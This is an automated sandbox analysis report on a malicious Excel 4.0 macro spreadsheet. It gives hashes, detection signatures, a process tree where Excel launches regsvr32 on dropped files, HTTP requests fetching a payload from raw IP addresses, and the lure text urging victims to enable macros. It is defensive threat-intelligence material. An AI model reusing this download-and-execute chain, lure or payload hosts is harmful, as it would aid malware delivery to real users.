Loading ...

Play interactive tourEdit tour

Windows Analysis Report Decline-172917164-06242021.xlsm

Overview

General Information

Sample Name:Decline-172917164-06242021.xlsm
Analysis ID:440340
MD5:f022a2159442cd4e16d7fe3dee1d634b
SHA1:cd4a698d83059462498e48b8dec47662bd2a0ec4
SHA256:4bd593279e649fae847a2b702655c571d7ca9e1949a422fa8d289250aeaa3305
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5708 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 4556 cmdline: regsvr32 ..\Kro.fis MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3500 cmdline: regsvr32 ..\Kro.fis1 MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3680 cmdline: regsvr32 ..\Kro.fis2 MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5708, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 4556

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: Decline-172917164-06242021.xlsmVirustotal: Detection: 17%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.3:49713 -> 5.253.62.174:80
    Source: global trafficTCP traffic: 192.168.2.3:49713 -> 5.253.62.174:80
    Source: excel.exeMemory has grown: Private usage: 1MB later: 87MB

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: global trafficHTTP traffic detected: GET /44372.3561747685.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.253.62.174Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44372.3561747685.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.234.247.7Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: unknownTCP traffic detected without corresponding DNS query: 185.117.73.74
    Source: unknownTCP traffic detected without corresponding DNS query: 185.117.73.74
    Source: unknownTCP traffic detected without corresponding DNS query: 185.117.73.74
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.7
    Source: unknownTCP traffic detected without corresponding DNS query: 5.253.62.174
    Source: global trafficHTTP traffic detected: GET /44372.3561747685.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.253.62.174Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44372.3561747685.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.234.247.7Connection: Keep-Alive
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.aadrm.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.cortana.ai
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.office.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.onedrive.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://augloop.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cdn.entity.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://clients.config.office.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://config.edge.skype.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cortana.ai
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cortana.ai/api
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://cr.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dev.cortana.ai
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://devnull.onenote.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://directory.services.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://graph.windows.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://graph.windows.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://lifecycle.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://login.windows.local
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://management.azure.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://management.azure.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://messaging.office.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ncus.contentsync.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://officeapps.live.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://onedrive.live.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://osi.office.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://outlook.office.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://outlook.office365.com/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://settings.outlook.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://staging.cortana.ai
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://tasks.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://wus2.contentsync.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar abovef 23 '4 Once you have enabled editing, please cli
    Source: Screenshot number: 8Screenshot OCR: Enable Content button from the yellow bar abo 25 26 27 28 29 30 31 32 33 34 35 36 FI S
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Decline-172917164-06242021.xlsmInitial sample: EXEC
